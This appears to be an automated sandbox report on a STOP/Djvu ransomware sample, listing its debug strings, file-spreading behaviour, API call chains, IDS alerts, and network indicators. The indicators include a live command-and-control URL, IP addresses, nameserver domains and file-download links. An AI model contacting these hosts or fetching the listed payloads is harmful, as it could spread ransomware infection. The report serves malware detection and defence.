          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G[- source: 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1928412478.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896722726.0000000003C68000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898391125.0000000003CB8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897980412.0000000003C87000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\] source: 66d5df681876c_file010924.exe, 00000007.00000003.1862736852.00000000038D7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\> source: 66d5df681876c_file010924.exe, 00000007.00000003.1874024202.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862419723.000000000358D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862505786.0000000003598000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874976893.00000000035C6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\he\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1781606614.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840342955.00000000034D4000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_0040F730
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_00410160
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,12_2_0040FB98
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00403626 GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403626

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.7:49706 -> 190.220.21.28:80
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 190.220.21.28:80 -> 192.168.2.7:49706
          Source: Network trafficSuricata IDS: 2036334 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key : 192.168.2.7:49705 -> 190.220.21.28:80
          Source: Network trafficSuricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 190.220.21.28:80 -> 192.168.2.7:49705
          Source: Malware configuration extractorURLs: http://cajgtus.com/test1/get.php
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: AMXArgentinaSAAR AMXArgentinaSAAR
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49706 -> 190.220.21.28:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 190.220.21.28:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49727 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49725 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49712 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 188.114.97.3:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
          Source: 66d5df681876c_file010924.exe, 0000000C.00000003.1345015807.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345195304.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345267437.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: cajgtus.com
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200GtY
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.phpj
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1355935941.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1379289635.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 66d5df681876c_file010924.exe, 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jedwatson.github.io/classnames
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://underscorejs.org/LICENSE
          Source: 66d5df681876c_file010924.exe, 0000000C.00000003.1344918775.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345031667.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: 66d5df681876c_file010924.exe, 0000000C.00000003.1345086458.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345122319.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: 66d5df681876c_file010924.exe, 0000000C.00000003.1345160231.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345195304.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: 66d5df681876c_file010924.exe, 0000000C.00000003.1345249561.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1345267437.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1369978087.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1353189092.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/9
          Source: 66d5df681876c_file010924.exe, 00000002.00000002.1252430363.000000000062D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251377452.000000000062D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1250134757.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/;
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000748000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonHB
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonI8=d8
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonPC
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonQ
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonRx
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonWi
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsoni
          Source: 66d5df681876c_file010924.exe, 00000002.00000003.1251308792.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251353345.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonj
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1273669336.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonv
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1273669336.000000000061C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/q
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1357385958.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1369978087.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1353189092.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1369978087.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1353189092.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1369978087.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1353189092.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.0000000000545000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1357773774.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/generate_204
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1846312432.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849676514.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/focus-trap/tabbable/blob/master/LICENSE
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847667825.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jsstyles/css-vendor
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1357773774.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/react-native-community/react-native-netinfo
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/license
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1845252752.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1373069786.0000000003440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850189989.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1847950905.0000000003300000.00000004.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1846853104.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://openjsf.org/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849676514.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849804677.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1849432694.0000000003300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1877581489.000000000054B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.c
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads(
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/abe121434ad837dd5bdd038
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d
